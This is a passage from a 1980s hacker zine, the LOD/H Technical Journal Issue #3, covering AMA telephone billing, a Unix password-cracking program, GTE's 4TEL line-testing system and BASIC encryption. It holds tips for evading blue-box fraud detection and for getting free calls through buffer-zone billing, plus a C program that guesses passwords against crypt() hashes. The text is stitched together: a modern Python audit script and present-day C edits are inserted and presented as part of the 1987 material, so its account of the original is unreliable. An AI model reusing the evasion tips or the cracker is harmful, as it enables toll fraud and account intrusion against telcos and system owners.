toll office has some sort of interface with this computer system, but I have
no solid proof of this. It has also been suggested to me from a reliable
source that AT&T sends each BOC their own magnetic tapes, which the BOCs then
fill with AT&T's billing information. I am not sure which of these methods is
used.

The BOC billing information takes a different route, however. On a regular
basis (I believe each day), AMARC tapes are sent to the Regional Accounting
Office (RAO) or billing office, where each customer's intra-LATA traffic is
calculated and their telephone bill printed and mailed. The customer then
receives the bill and goes about whatever method of payment he chooses.
Telephone bills can usually be paid in person in many different places in
large cities, or they can be mailed in directly if the customer wishes. In my
area, the customer pays once, which is a total of his AT&T and BOC bill. This
is payable to the BOC, and AT&T then gets their payment from the BOC. In the
case of independent carriers such as US Sprint, MCI, ALC Communications, and
the like, I cannot say for sure what they all do as there seems to be no
standard procedure for this interaction, but in two instances, two specific
RBOCs (US West and BellSouth) handle FG-D Equal Access style billing for MCI
throughout their serving areas. There is a computer system involved in this
alternate carrier billing cycle, called the Carrier Access Billing System
(CABS). This system calculates the prices based on tariffs in use, and bills
the carriers on a monthly basis accordingly. I am not sure how widespread the
use of this system is, though. When the customer receives his MCI bill along
with his BOC bill he can pay them both at once. I would imagine that the
larger long distance services would be able to afford getting this service
from the RBOCs, while the smaller ones with less money would do it by
themselves, which would probably be a slow, drawn out process. In some cases,
dialing via an alternate carrier (other than your primary one) will cause the
billing cycle to take anywhere up to three months to complete, or even more.
Another interesting note about alternate carrier dialing: some carriers do not
start billing until a specific amount of time has elapsed. This is known as
buffer-zone billing. I know of one company that uses a 45 second buffer zone,
but I am not sure what the other companies use. You can find this information
out by talking to a customer service department; however, some companies' CS
departments either don't know, or they do not wish to tell the customer (or
'potential' customer). With buffer zone billing (assume 45 seconds in this
case), you will be billed for the call if you let the phone ring, listen to a
busy signal, etc. if the duration of the call is greater than or equal to 45
seconds. Many of the ICs that use this type of billing do not have the
equipment to detect answer supervision, so if you can keep a conversation very
short, you may get away with a free call, without breaking any laws.

CALL CREDITING
--------------

When you receive credit for improperly placed long distance calls from an
operator or a telco business office (after you receive your phone bill)
certain things happen.

Operator crediting involves the operator entering a special flag on an AMA
tape to deduct the specific amount of given charge from the subscriber's
telephone number. I believe that this process involves (with AT&T TSPS) the KP
TRBL key, and (with NTI's TOPS) the KP TRBL and the CHG ADJ (charge adjust)
keys.

Business office crediting happens when you call the business office and
talk to a BOC 'service representative'. This person will then enter your
telephone number into a terminal, using the DOE (Direct Order Entry) system,
which is in use in my area. The billing record information comes from a
computer called CRIS (Customer Record Information System), which is accessed
by BOSS (Billing and Order Support System). BOSS has a link to computer
systems at the RAO, as this is how the customer's toll data gets to the
business office. A service representative can then pull up your toll charges
and correct them with appropriate credit entries.

SECURITY (EVERYONE READ THIS PART)
-----------------------------------

There have been several rumors going around about AMA and its relation to
people who commit toll fraud, and I will attempt to clarify these rumors. It
is possible that a billing tape could be used to try to find out who called a
certain number at a given time. Another way AMA tapes/disks could be used as a
record of someone committing toll fraud would be if this person would happen
to be under a newer switch, such as the DMS-100, and they attempted to use a
blue box without knowing the dangers of it (I will speak only on the DMS-100
because when an older switching system is replaced with a new one, the most
common replacements are the AT&T No. 5 ESS and the Northern Telecom DMS-100
Family of switching systems). DMS-100 does indeed have the capability to
record a blue boxer's MF tones in an AMA record if the boxer doesn't know what
he is doing. 1AESS also has blue box detection features. I am not sure about
other switching systems, but I would guess that most of the newer switches
have some sort of blue box fraud detection features; of course the end user of
these switches (the telco) does not have to use them. However, it is difficult
to find out if your CO uses anything of this nature unless you are a good
social engineer or have access in some way to the switch or switch output
messages and know what to look for. For instance, on the Northern Telecom
DMS-100 switching system, there are a series of reports known as BLUEBOX
reports which (if in use) will inform the telco of blue boxing activity. The
DMS-100 also has AMA options that can detect certain forms of electronic toll
fraud, such as black and blue boxing. These options can be set any way the
telco wants. These AMA options can be printed on a DMS-100 switching
system, onto hardcopy terminals, or onto a data channel which may send the
Output Messages (OMs) to a telco computer system such as the Switching
Control Center System (SCCS). These options are printed in an AMA118 OM at
midnight. If an AMA option is in use by that particular switching system,
after the name of the option will be a data field that says ACTIVE. If the
option is not in use, the field will say INACTIVE. An example of an AMA118 OM
is reproduced here.

AMA118 JUL23 12:00:00 2234 INFO AMA-OPTIONS
AUDIT: ACTIVE
CALL-FWD: ACTIVE
CDAR: INACTIVE
CHG411: ACTIVE
CHG555: ACTIVE
COIN: INACTIVE
DA411: ACTIVE
ENFIA-B-C: INACTIVE
FREECALL: INACTIVE
HIGHREV: INACTIVE
INWATS: ACTIVE
LNID: INACTIVE
LOGAMA: INACTIVE
LOGOPT: ACTIVE
LONGCALL: ACTIVE
LUSORIG: INACTIVE
LUSTERM: INACTIVE
OBSERVED: INACTIVE
OCCOVFL: ACTIVE
OCCTERM: ACTIVE
OUTWATS: ACTIVE
OVERFLOW: ACTIVE
SST: ACTIVE
TIMECHANGE: ACTIVE
TRACER: ACTIVE
TRKID: INACTIVE
TWC: INACTIVE
UNANS-LOCAL: INACTIVE
UNANS-TOLL: ACTIVE

The most important ones for phreaks to know about are INWATS, LONGCALL,
SST, UNANS-LOCAL, and UNANS-TOLL. INWATS means that calls to 800 numbers are
noted in an AMA record. As far as I know, this option is a required one, at
least since Bulk Change Supplement 23 (BCS23). LONGCALL will flag long calls
in an AMA record. So if it seems to the switch that someone has been on the
phone for a long time, this will be logged. A possible use for this would be
to detect trouble conditions. This option, used in past switching systems, may
have been the cause of many blue box busts. Someone would box for several
hours using the same number (for instance, Directory Assistance) and this may
have been noted by the switch. Another way I think old time boxers may have
been nailed is from boxing off of DA. As you can see in the above listing,
there are several options that probably make AMA entries for calls to DA. If
the length of a call to DA lasts longer than a certain amount of time, the
telco could possibly detect this and attach a monitoring device upon the
suspected person's telephone line. The AMA option 'SST' may also be responsible
for blue box busts in the recent past. SST stands for Short Supervisory
Transition, and an SST is known to the phreak world as a wink. SSTs are
generated when a blue boxer seizes a trunk. The switch can detect these and
log them in an AMA record if the option is set to ACTIVE. SSTs are not solely
caused by boxers, though, as equal access offices can generate a lot of SSTs
in normal operation. I believe that trunking arrangements with ICs (InterLATA
Carriers) are often responsible for triggering these. One toll office I knew
of had thousands of SSTs on a plant measurement report, so if this option is
ACTIVE, it may not be EXTREMELY dangerous, but it can't hurt to know about
this. One possible way around the SST detect is to make your 2600Hz tone last
several seconds. I do not remember the exact figure, but after a certain
number of seconds an SST ceases to be an SST. I am not
sure if these longer transitions are logged or not, or if there is even an
option for this. However, I believe that the BLUEBOX feature could not be
fooled by doing this. BLUEBOX, if activated, will detect any foreign winks
after a necessary one (necessary for call completion) occurs. Of course you
can always avoid having your DN associated with anything like this by
re-directing your call flow, which can be accomplished easily.

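The AMA118 listing above is plain text, so the first thing a telco security or audit person would do with it is automate the check: parse the OM, flag which of the five options the text singles out are INACTIVE, and compare two midnight reports so that an option quietly switched off shows up the next morning. The Python below is an added example written for this article, not Northern Telecom code or anything from the journal; the header layout is inferred from the single sample reproduced above, the embedded sample text is a retyped copy of that sample, and treating the five options as mandatory is an assumption, since the text says a telco may set them any way it wants.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: a retyped copy of the AMA118 OM reproduced in the article.
SAMPLE_AMA118 = """\
AMA118 JUL23 12:00:00 2234 INFO AMA-OPTIONS
AUDIT: ACTIVE
CALL-FWD: ACTIVE
CDAR: INACTIVE
CHG411: ACTIVE
CHG555: ACTIVE
COIN: INACTIVE
DA411: ACTIVE
ENFIA-B-C: INACTIVE
FREECALL: INACTIVE
HIGHREV: INACTIVE
INWATS: ACTIVE
LNID: INACTIVE
LOGAMA: INACTIVE
LOGOPT: ACTIVE
LONGCALL: ACTIVE
LUSORIG: INACTIVE
LUSTERM: INACTIVE
OBSERVED: INACTIVE
OCCOVFL: ACTIVE
OCCTERM: ACTIVE
OUTWATS: ACTIVE
OVERFLOW: ACTIVE
SST: ACTIVE
TIMECHANGE: ACTIVE
TRACER: ACTIVE
TRKID: INACTIVE
TWC: INACTIVE
UNANS-LOCAL: INACTIVE
UNANS-TOLL: ACTIVE
"""

# Header layout is an assumption inferred from that one sample:
# message id, date, time, sequence number, then the INFO AMA-OPTIONS label.
HEADER_RE = re.compile(
    r"^AMA118\s+(?P<date>[A-Z]{3}\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2})"
    r"\s+(?P<seq>\d+)\s+INFO\s+AMA-OPTIONS\s*$"
)
OPTION_RE = re.compile(r"^\s*(?P<name>[A-Z0-9-]+):\s*(?P<state>ACTIVE|INACTIVE)\s*$")


@dataclass
class Ama118Report:
    date: str
    time: str
    sequence: int
    options: dict = field(default_factory=dict)  # option name -> True if ACTIVE


def parse_ama118(text: str) -> Ama118Report:
    """Parse one AMA118 OM; raise ValueError on anything outside the expected layout."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty AMA118 message")
    head = HEADER_RE.match(lines[0])
    if head is None:
        raise ValueError(f"not an AMA118 AMA-OPTIONS header: {lines[0]!r}")
    report = Ama118Report(head["date"], head["time"], int(head["seq"]))
    for ln in lines[1:]:
        opt = OPTION_RE.match(ln)
        if opt is None:
            raise ValueError(f"unparseable option line: {ln!r}")
        if opt["name"] in report.options:
            raise ValueError(f"duplicate option: {opt['name']}")
        report.options[opt["name"]] = opt["state"] == "ACTIVE"
    return report


def is_valid_ama118(text: str) -> bool:
    """True if the text parses as an AMA118 AMA-OPTIONS message."""
    try:
        parse_ama118(text)
    except ValueError:
        return False
    return True


# The five options the article singles out as recording toll-fraud indicators.
# Which options a telco really requires is its own policy; treating these as
# mandatory is an assumption made for this audit.
FRAUD_DETECTION_OPTIONS = ("INWATS", "LONGCALL", "SST", "UNANS-LOCAL", "UNANS-TOLL")


def inactive_fraud_options(report: Ama118Report, required=FRAUD_DETECTION_OPTIONS):
    """Required options that are INACTIVE or absent from the report, in policy order."""
    return [name for name in required if not report.options.get(name, False)]


def diff_options(previous: Ama118Report, current: Ama118Report):
    """Options whose state differs between two midnight reports.

    Returns {name: (old_state, new_state)}; None marks an option absent from one
    report. A detection option going ACTIVE -> INACTIVE overnight is worth an alarm.
    """
    changed = {}
    for name in sorted(set(previous.options) | set(current.options)):
        old, new = previous.options.get(name), current.options.get(name)
        if old != new:
            changed[name] = (old, new)
    return changed


if __name__ == "__main__":
    report = parse_ama118(SAMPLE_AMA118)
    active = sum(report.options.values())
    print(f"AMA118 seq {report.sequence} {report.date} {report.time}: "
          f"{active}/{len(report.options)} options ACTIVE")
    print("detection options not active:", inactive_fraud_options(report))
```

Run against the sample, the audit reports UNANS-LOCAL as the one singled-out option that is not active; feeding it the next night's OM as well turns any option that was flipped in the meantime into a one-line diff, which is the check that matters if the SCCS data channel is the only place these options are ever visible.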
Another AMA option that could be used to catch black boxers is the
UNANS-TOLL option. When this option is ACTIVE, toll calls ringing longer than
a specific period of time can be logged in an AMA record. Someone calling toll
from a DMS-100 to a person using a black box (does anyone still use devices
like the black box anyway?) in a No. 5 crossbar may trigger this option to be
logged. I say 'may' because I am not positive about this; the option could
also be used in other ways, I imagine.

The ENFIA-B-C option is one that could possibly present a problem to a
telecom enthusiast. I have seen the term ENFIA (Exchange Network Features for
Interstate Access) associated with a Feature Group A (POTS dialup) long
distance service. ENFIA-B and C mean FG-B and FG-C service. FG-A and B (POTS
and 950+1/0xxx respectively) could possibly be used to record information
concerning toll fraud. For instance, I know of one service (FG-D and FG-B)
that has the ability to check a telco's magnetic tape to see what numbers have
been accessing their service. If a large amount of fraud became a problem, the
carrier could get the AMA information to try and determine who is committing
toll fraud. I'm not sure if other companies have this option; I would guess
that almost all of the major companies (MCI, Sprint, Allnet, etc.) have the
ability to use something of this nature to track down security problems.

Have you ever wondered why many of the old blue boxers were caught? It is
due to the use of AMA. AMA records can reveal boxing patterns, and this info
can be used by the telco to track down blue/red/black box users. So if you are
a person who practices any of these methods, be aware of what you are up
against. Boxing has been around for a very long time and the telco knows all
about what goes on and the different methods that people use. So use care. An
informed phreak is a free phreak.

SUMMARY
-------

Hopefully this article has helped clear up any misconceptions about AMA
that anyone might have had, as well as provide a reference to be looked back
on. The information contained in this article can also be used for social
engineering purposes, if you so desire. However, I do not intend for any of
this information to go into harmful purposes, such as billing calls to other
people, or causing confusion and disorder at any internal points in the telco.
Such actions do not make a person a phone phreak. However, if you find out
anything interesting concerning AMA that isn't included here, or anything
about independent telcos' billing systems, feel free to let me know.

If you wish to contact me concerning this article, you can find me on a
few BBS's. I will attempt to answer any questions anyone might have, and would
like to hear from anyone who has a valid interest in the workings of the phone
systems.

===============================================================================
Thanks go out to all the people (too many to mention) who have contributed any
information (no matter how small or large) to this article. Other information
for this article has been taken from switching system messages, Bell System
Technical Journals, Bell Labs RECORDs, Bellcore documents, and various other
technical literature and information. I hope someone likes this article
because it took a very long time to complete.
===============================================================================

---------------------- Shooting Shark's PW Hacker Update ---------------------

The following is a reprint of Shooting Shark's post, in which he provides
another program which can be typed quickly or uploaded to the unix system of
your choice. This program can be used to ensure that the algorithm does work
and you could then proceed to upload his program from Issue #2 for more
extensive password finding. I was able to get his HPW.C program to run
perfectly, and have found quite a few passwords by having it check passwords
with dictionary entries and other files of probable passwords.

-Lex Luthor

Taken from: The Free World II 301-668-7657 BBS (no longer up)

%> When: 9-19-87 at 3:46 am

Since three people have told me my source won't compile on their system,
I've taken the suggestion and put together a *very* stripped-down version of
my HPW.C program from Issue #2. Now it's basically a 20-line engine that you
can use to verify that the algorithm does indeed work (try it with your own
password) and then add whatever bells and whistles you want (like reading
words from a file, etc.) The version presented here just prompts the user
for the encrypted password string, and then goes into an endless loop where it
reads a password attempt from the keyboard, encrypts and compares it, and
tells the user if it's the correct password. It calls no external routines
besides crypt(), printf(), scanf(), strcmp() and exit(). crypt() is
absolutely essential to the program, and the rest are defined in K&R so this
program had *better* work on your unix system!

Here it is. Sorry for the hassles the old version gave anybody, although
some people were able to get it to run quite nicely.

- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -

/* Stripped-down crypt() check as posted: read the hashed password string,
 * then crypt() each typed attempt with that string as the salt and compare.
 * The listing was garbled in transmission ('$' for '{', 'Xn' for '\n', and
 * the closing braces lost); they are restored here, headers are added, and
 * the scanf() calls are width-limited so the buffers cannot overflow. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <crypt.h>      /* glibc/libxcrypt; BSDs declare crypt() in <unistd.h>. Link with -lcrypt. */

char crbuf[128], *pw, pwbuf[64];

int main(void)
{
    printf("first, carefully type the ENCRYPTED password string:\n>");
    if (scanf("%127s", crbuf) != 1)
        return 1;
    printf("Now, type a password attempt at the prompt. type QUIT\n");
    printf("(yes, in caps) on a blank line to quit...\n\n");
    for (;;) {
        printf("try >");
        if (scanf("%63s", pwbuf) != 1)      /* end of input: stop */
            break;
        if (!strcmp(pwbuf, "QUIT"))
            break;
        pw = crypt(pwbuf, crbuf);           /* salt is taken from the hash itself */
        if (pw != NULL && !strcmp(pw, crbuf)) {
            printf(" ==> %s is correct.\n", pwbuf);
            exit(0);
        }
    }
    printf("done.\n");
    return 0;
}

- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -

The LOD/H Technical Journal, Issue #3: File 05 of 11

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
(L)                                             (L)
(O)   An Overview of the Teradyne 4Tel System   (O)
(D)                                             (D)
(+)                      by                     (+)
(+)                                             (+)
(+)                 Doom Prophet                (+)
(L)                                             (L)
(O)           Legion of Doom/Hackers!           (O)
(H)                                             (H)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

4TEL is a loop testing system mainly used by General Telephone (GTE) that
consists of a Voice Response System and a Craft Dispatch Section as well as
the facilities and equipment used for testing functions. The following text
will attempt to dispel many of the 4TEL myths that have been created in the
past years, such as the idea that it can be used to eavesdrop on lines within
its serving area. The information provided has been gained from company
publications and from personal experience. A 4TEL is not the same thing as a
REMOBS, which stands for REmote service OBservation System.

The portion of the system that some of the phreak/hack population is
familiar with is the Voice Response System, which has normal POTS dialups.
This system greets the user with an announcement message and then asks for a
password, which is entered in DTMF tones. The legitimate use of these dialups
is for outside craft personnel (linemen) to call in, perform tests and
receive the results for subscribers' lines. The VRS is provided so craft
personnel can access the 4TEL system at times when no one is at the testboard
(at nights or weekends). Through the VRS, up to 8 craft/technicians can access
4TEL at the same time, enabling them to get more done in a smaller amount of
time.

After a password has been accepted by the system, the electronic voice
will ask for the line number that the user wishes to be tested. The number
entered will be read back to ensure correct entry. The system will then ask
for the user to enter the mode. The modes are:

1: Calling on other line
2: Calling on test line
3: Line test results

It is possible on some VRS's to get a listing of the modes by dialing 0
when the voice prompts. Line tests are possible from both modes 1 and 2 by
dialing the octothorpe (#) key. The results of the test will be announced
along with the length of the cable in miles. Bridged ringers, if any, will
also be noted. Mode 3, the line test results section, will tell the user there
are no test results available unless they have been previously entered. The 7
key is the monitor command from both test modes. If there is speech on the
line, it will be detected electronically but will NOT be heard by the user.
The monitor command is not 'REMOBS' (Remote Observation) but a method of
determining if the line is busy due to normal means (conversation) or due to
some trouble condition at the switch. When the system asks for the ID code for
a monitor command, the system will accept the line number as well as the
initial password, and even a secondary password before dialing, but it has not
been determined by the author if this is a standard for every 4TEL. Not just
anything will work for the monitor password, however, as it will announce
whether the ID code entered is invalid or not.

If mode 1 is entered, these commands are available:

MODE ONE COMMANDS:

1-Fault location
2-Other Testing
7-Test OK, monitor
8-Hang up
9-Enter next line number

If option 7 is chosen, another menu will be available if the line tests
busy.

2-Monitor test
3-Override and test
4-Wait for idle

If suboption one (Fault location), mode one, is chosen, these commands are
available:

1-Open location
3-Short location
4-Cross location
5-Ground location
8-Hang up

If suboption two (Other testing), mode one, is chosen, these commands are
available:

2-Loop ground Ohms
3-Dial tone test
4-Pair ID
8-Hang up

MODE TWO COMMANDS:

2-Other testing
7-Test OK, monitor
8-Hang up
9-Enter next line number

If suboption 2 (Other testing), mode two, is selected, these commands are
available:

2-Loop ground Ohms
8-Hang up

The 4TEL system's main use is for standard testing, which is done nightly
upon every line in an exchange. This locates faults and problems before they
have to be reported by customers. All lines that have trouble detected upon
them are printed out in a report at the repair center the next morning where
the proper fault location and dispatching can be done. The measurement and
test unit of the 4TEL system is called a COLT, Central Office Line Tester,
which performs all nightly and on demand tests upon the exchange through local
test trunks.

There are a few different types of COLTs. The standard version will serve
any CO for up to 10,000 subscribers. The COLT RS is used in rural step by step
offices (referred to as 'steppers' also) for up to 1,300 lines. The Digital
COLT is used for digital Central Offices. These can have remote Colt
Measurement Units (CMU's) for remote switches which are controlled by the Colt
Computer Unit (CCU) at the host switch. The CMU speed calls the CCU at night
to start the testing and direct the operations. The CMUs in regular end
offices have digital links (over the normal telephone network) with the SAC,
which is how the line test results are distributed to the repair center.

The 4TEL system can also test lines upon command by a human operator at
the SAC (Service Area Computer). The CRT operator enters the line number in
the proper field and 4TEL runs a full series of tests as well as displaying
past line history, fault summary, volts and current information, and the cable
length. The results of the testing are displayed in plain English, as opposed
to decimal or other format, on the screen. A dispatch decision is also
displayed after every line test to determine if a dispatch is needed.

SAC's
-----

The SAC is the centralized focal point for 4TEL control and reporting.
This computer is located in the repair center and distributes test/work
information between CRT's and COLT's. The SAC formats the results of routine
testing into a daily advisory report as mentioned earlier.

There are several types of 4TEL reports that are worth noting. The
DISPATCH report lists troubles that can have an immediate dispatch for them.
These also tell the location of the fault (cable, CO, station, etc.) and are
classified into two types, moderate and severe, relating to how service
affecting the problem may be. The CABLE report lists all new cable faults. A
Plant Status report summarizes the condition of the outside plant and totals
them per individual exchange. In these reports, trouble conditions can be
listed in a variety of ways. CROSSES and WETS refer to line insulation faults
and may indicate water penetration of the cable. SHORTS and GROUNDS are
insulation faults at the station set. OPENS refer to a broken, or 'open' Ring
or Tip lead in a Cable Pair. BACKGROUND refers to electrical noise caused by
power lines being nearby. ABNORMAL VOLTAGE indicates high voltage conditions.
There are others, but the reader will hopefully get the idea from the ones
listed above.

CDS
---

Another major part of the 4TEL system is the Craft Dispatch System, which
is a DTMF and speech response setup used to exchange report and schedule
information between the repair center staff and outside craftspersons. Linemen
call in to get dispatch information that has been previously entered by the
dispatcher. CDS plays back the info one field at a time. When the craft
person is ready to receive the next field of information, he simply says
'Go' and the system continues. A printer at the repair center informs the
dispatcher when a craftsperson has received a report. When the trouble is
taken care of, a completion report is done on the CDS in which it asks for the
closeout and schedule one field at a time to be entered in DTMF and in speech.
The clerk at the repair center then closes the trouble on the SAC/4TEL system
after the line is tested a final time to ensure proper operation.

CDS may also have audit trails of every transaction for a certain time
period. So, to summarize the work flow involving the CDS: an irate customer
calls the clerk at the repair center. The information is forwarded to the
dispatcher who enters it into CDS. Craft personnel call in and receive the
messages, do the required work, then file a completion report. The clerk then
closes out the trouble in SAC/4TEL.

The Digital Concentrator Measurement Unit is another component of the 4TEL
testing equipment that is used to test lines in digital concentrators such as
the GTE MXU and the NTI-OPM. They are located inside Digital Loop Carrier
system remote terminals or huts and consist of a circuit board and measuring
system. It provides AC and DC measurements of subscriber loops, as well as all
the normal test/measurement functions such as fault description and location,
dispatch messages, and special tests. The DCMU can test the lines of an
individual DLC remote terminal, or a group of terminals that are located
together. The capacity of terminals that the DCMU can test is determined by
analysis of test traffic and economic factors as well. Both the CRT at the SAC
and the VRS are compatible with the DCMU. These units are self calibrating,
unlike the PMU's of an LMOS supported Loop Testing System. The 4TEL CCU is
linked to the DCMU via either a 1200 baud dial up or a dedicated link,
depending upon the size of the office.

Some of the tests that 4TEL performs are loop and ground resistance (which
detects resistance faults and sheath ground problems), dial tone test (in
which the number of times dial tone can be drawn during a certain period is
recorded), busy line monitoring (not BLV or REMOBS), coin station tests
(totalizer, coin relay, etc), as well as all the standard tests which were
covered above. A pair identification can also be done, in which a tone is
placed on the pair to help those at terminal cabinets locate that specific
one, similar to the LMOS/MLT tone applique function.

Miscellaneous notes
-------------------

If a user enters the number of the 4TEL system they have dialed in upon,
|
||
the system will announce an intercept. A user cannot monitor/test Directory
|
||
Assistance through 4TEL. Lines that are out of the system's NPA can be tested
|
||
also, but a 1 has to be dialed before the number just like an ordinary toll
|
||
call. The 4TEL VRS will give the user a 'beep' tone after a few seconds of
|
||
waiting for input. If the user doesn't enter anything, the VRS will
|
||
disconnect. A version of 4TEL is also used by Rochester Telephone in New
|
||
York, and there may be other independent companies that use the system. Try
|
||
to find out what system you're served by. If you're in a Bell area, it will
|
||
most likely not be 4TEL, but LMOS.
|
||
|
||
|
||
|
||
I hope that this article has helped readers to better understand the way the
|
||
4TEL system operates. Again, there may be some differences depending upon the
|
||
area and the company. Thanks go to Taran King, Phantom Phreaker, and Lucifer
|
||
666 for supplying information in one way or another that contributed to this
|
||
file.
|
||
|
||
|
||
Doom Prophet/LOD
|
||
The LOD/H Technical Journal, Issue #3: File 06 of 11


        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                                                           |
        |       Secure Data Encryption with Cellular Automatons     |
        |                                                           |
        |                            by                             |
        |                                                           |
        |                        The Mentor                         |
        |                                                           |
        |               A Legion of Doom Presentation!              |
        |                                                           |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


     One of the key issues that concerns anyone who has sensitive or illegal
information on their computer system is preventing unauthorized access to this
information. Even if you hit a key that deletes everything on the hard disk
when you see that four-door sedan pull up in the driveway, any idiot with
Norton's Utilities (IBM) or Copy II+ (Apple) can recover anything that's on
your drive with minimal effort. A delete command only changes a flag in the
VTOC (volume table of contents); it doesn't actually *remove* the file from
your system.

     There are two methods to ensure that your data can't be read by a sector
editor or recovered by NU. The first is to overwrite everything with a NULL
(FF) or anything else for that matter. I've seen one batch file that does a
global delete, creates a file that says 'EAT HOT DEATH', and then begins
copying it until disk space is full. Unfortunately, you can't always guarantee
that you will be able to get to your computer before someone else does.

     The second method is to encrypt your data. Most people have visions of
data encryption being some sort of arcane process akin to summoning demons or
talking with Dead Cow Cult members (two closely related processes.) In
practice, it isn't that difficult. This file is intended to show some very
short programs that will encrypt data beyond the ability of anything short of
a dedicated mainframe to crack.


     How to use: The code examples I provide will be in MicroSoft's
AmigaBASIC. It is fairly generic and you should be able to convert it over to
IBM, //e, c, gs, Mac, ST, C64, or any flavor of mainframe you like. For those
of you setting up systems on Packet-Switched Networks (such as the LOD/H system
one of our members is implementing) data encryption should be considered
absolutely necessary to maintain security.

     The terseness of the routines makes them easy to insert in a bulletin
board also, although conversion into C or Assembly would be necessary for
decent speed.


     Intro to Cryptography: Long before computers were around, there was a
need for data security. Everyone used lemon juice as 'invisible ink' when they
were a kid, heating it over a candle to bring it out. And everyone has seen
the substitution code where "A" = 1, "B" = 2, "Z" = 26, etc...

     The easiest form of encryption involves a variation of the previous.
First of all, don't think of A = 1 as a substitution, think of it as a
remapping. Let's say we have a language made up of the five vowels, and we
wanted to remap them to the numbers 1-5. Our map would look like this:
"AEIOU12345" and our mapping function would be f(c) = POSITION(c) + x where c =
the letter to map and x is the key (in this case 5.) So every time we needed
to encrypt a letter, we would take its position in the map, add 5 to it, and
come up with the character to substitute. For the entire alphabet, the mapping
function would be f(c) = POS(c) + 26 for the map "A..Z,1..26".

     Your map should be composed of all the characters that will be used for
encryption. In a text only encrypter, this will consist of all the printable
characters your machine can use. The same method can be used to encrypt binary
files, but it's not as clear as text only for a teaching example.

     The problem with this simple form of encryption is that your average C64
could crack it in a matter of minutes. Enter into the next level of
cryptography, random numbers.

     During World War II the Allied Forces created a system to generate
random electric noise, recorded this noise onto a wax cylinder, and scrambled
radio transmissions by mixing the seemingly random noise with the voice
transmission. The soldiers in the field needed an imprint of the same cylinder
to be able to understand the message. Think of the wax cylinder as a
'filter' for the crypted message.

     A random number generator can be easily used to encrypt data providing
you realize the following: a random number generator on a computer is not
really random. If you initialize the generator with the same seed value on two
separate occasions, it will return the same sequence of pseudo-random
numbers. Most BASICs use the RANDOMIZE <seed> command to start the generator
off. If you leave off the seed, they get a seed from the system clock or some
other fairly random source, providing a much truer random selection. But by
declaring the seed yourself, you can be sure that you will be able to reference
this same string of numbers, a string that is very hard to figure out without
the key (seed.)

     Program Listing 1 is an example of a BASIC encrypt/decrypt system that
uses the built-in random number generator included on the machine (or language
implementation.)


Program Listing 1
-----------------

REM ************************************************************************
REM
REM Ok, this is an example of very basic encryption. It takes the input
REM string and the input key and processes them using the machine's built
REM in random number generator. This version is written in AmigaBASIC 1.2.
REM It can be compacted quite a bit by writing it in C, but it's an easy
REM algorithm to crack.
REM
REM ************************************************************************

INPUT "String to be encoded"; C$
INPUT "Key Please! ";K


REM ************************************************************************
REM
REM When you use the RANDOMIZE command, it seeds the random number gener-
REM ator with the key K. *EVERY* time you seed the generator with the same
REM value, you will get the same sequence of pseudo-random numbers. Since
REM the built in random-number generator uses a linear algorithm to gener-
REM ate the sequence, it's easy (relatively) to crack.
REM
REM ************************************************************************

RANDOMIZE K

REM ************************************************************************
REM
REM The only difference between encoding and decoding is which way you
REM move in your Q$ array space. Encoding takes the original and shifts
REM to the right, decoding takes the coded value and shifts to the left.
REM
REM ************************************************************************

REREAD:
INPUT "Encode or Decode ? ";A$
A$=LEFT$(A$,1)
IF A$="E" OR A$="e" THEN
  A=1
  GOTO HEAD
END IF
IF A$="D" OR A$="d" THEN
  A=-1
ELSE
  GOTO REREAD
END IF

REM ************************************************************************
REM
REM Q$ contains all the characters that can be encoded. Every encoded
REM character will be mapped to a character in this array. I haven't
REM included any non-standard characters, so you will have to customize
REM it to your particular keyboard/system. I've included an error check
REM that will abort the encryption if it encounters a character that isn't
REM in Q$. I have to use the STRING$ command to insert the spacebar and
REM the quote into the string. It could also be done with a CHR$(##) in
REM many BASICs. You could expand this to include any non-printable
REM characters you'd like so you could do non-text files.
REM
REM ************************************************************************

HEAD:
SPACE = 32
QUOTE = 34
Q$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
Q$=Q$+"1234567890!@#$%^&*()-=_+[]$;:'.,<>/?X|D"
Q$=Q$+STRING$(1,SPACE)+STRING$(1,QUOTE)
QSIZ = LEN(Q$)
D$ = ""

REM ************************************************************************
REM
REM This is the main loop. L = length of the string to encrypt. In this
REM example, I am only encrypting a single string. Most people who will
REM actually use this will change the FOR loop to run until an EOF is
REM encountered in the input file. Since the syntax for that will vary
REM widely from system to system, I'll leave it out.
REM
REM ************************************************************************

L=LEN(C$)
FOR I = 1 TO L

  REM /* Finds character I in the input string */
  X$ = MID$(C$,I,1)

  REM /* Finds the integer location of the character in Q$
  REM    returns variable POZ */
  GOSUB LOKPOZ

  REM /* RND returns a random # between 0 and 1. Multiply it by the
  REM    size of array Q$ and keep the integer part: that is the number
  REM    of positions to move when encoding or decoding. Both passes
  REM    draw the same sequence because both RANDOMIZE with K. */
  POZMV = INT(RND * QSIZ)

  REM /* Encoding (A = 1) shifts to the right by adding, decoding
  REM    (A = -1) shifts to the left by subtracting. Q$ positions are
  REM    1-based, so shift on a 0-based index, reduce it modulo QSIZ
  REM    (adding QSIZ first so a negative remainder can't fall outside
  REM    the array) and step back to 1-based. */
  NUPOZ = ((POZ - 1 + A * POZMV) MOD QSIZ + QSIZ) MOD QSIZ + 1

  REM /* Now you assign the new character in array Q$ to Y$, and append
  REM    it to your converted string */
  Y$ = MID$(Q$,NUPOZ,1)
  D$ = D$ + Y$
NEXT I

PRINT "Original = ";C$
PRINT "Modified = ";D$
END

REM /* This finds character X$ in array Q$ and returns the integer
REM    value of the location in POZ. Called from the main loop. */
LOKPOZ:
POZ = 1
TOP:
IF MID$(Q$,POZ,1) = X$ THEN RETURN
POZ = POZ + 1
IF POZ > QSIZ THEN
